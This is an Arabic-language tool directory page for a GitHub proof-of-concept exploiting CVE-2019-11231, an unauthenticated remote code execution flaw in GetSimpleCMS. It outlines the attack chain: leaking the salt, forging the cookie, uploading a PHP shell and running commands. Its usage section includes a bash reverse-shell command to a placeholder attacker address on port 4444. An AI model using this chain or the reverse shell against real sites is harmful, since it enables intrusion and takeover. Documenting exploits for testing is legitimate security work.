Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-11231-PoC — CVE-2019-11231 PoC | Kitploit
أدوات/GitHubGitHub/akincibor/cve-2019-11231-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubakincibor/cve-2019-11231-poc

CVE-2019-11231-PoC

CVE-2019-11231 PoC

عرض المستودع
1منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال RCE في GetSimpleCMS CVE-2019-11231

Python CVE

استغلال تنفيذ تعليمات برمجية عن بُعد بدون مصادقة لـ GetSimpleCMS ≤ 3.3.15

الثغرة

GetSimpleCMS تعرض ملفات حساسة للعامة (/data/other/authorization.xml, /data/users/) مما يسمح للمهاجمين بـ:

  1. تسريب مفاتيح API وأسماء المستخدمين
  2. تزوير ملفات تعريف الارتباط للمصادقة
  3. الحصول على رموز CSRF
  4. رفع وتنفيذ كود PHP عشوائي

درجة CVSS: 9.8 (حرجة)

الاستخدام

root@kitploit:~
pip install -r requirements.txt
python3 exploit.py http://target.com "id"
python3 exploit.py gettingstarted.htb "whoami"
python3 /tmp/test.py gettingstarted.htb "/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"

كيفية العمل

  1. تعداد الإصدار → GET /admin/
  2. تسريب الملح → GET /data/other/authorization.xml
  3. الحصول على اسم المستخدم → GET /data/users/
  4. تزوير ملف تعريف الارتباط → SHA1(username + salt)
  5. الحصول على nonce → GET /admin/theme-edit.php
  6. رفع شيل → POST /admin/theme-edit.php
  7. تنفيذ الأوامر → GET /theme/shell.php?cmd=...

الملفات

  • exploit.py - النص البرمجي الرئيسي للاستغلال
  • requirements.txt - التبعيات (requests, beautifulsoup4)

إخلاء مسؤولية

⚠️ لأغراض تعليمية فقط. اختبر فقط على الأنظمة التي تملكها أو لديك إذن باختبارها.

المراجع

  • https://ssd-disclosure.com/archives/3899/ssd-advisory-getcms-unauthenticated-remote-code-execution
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11231
تنزيل الأداة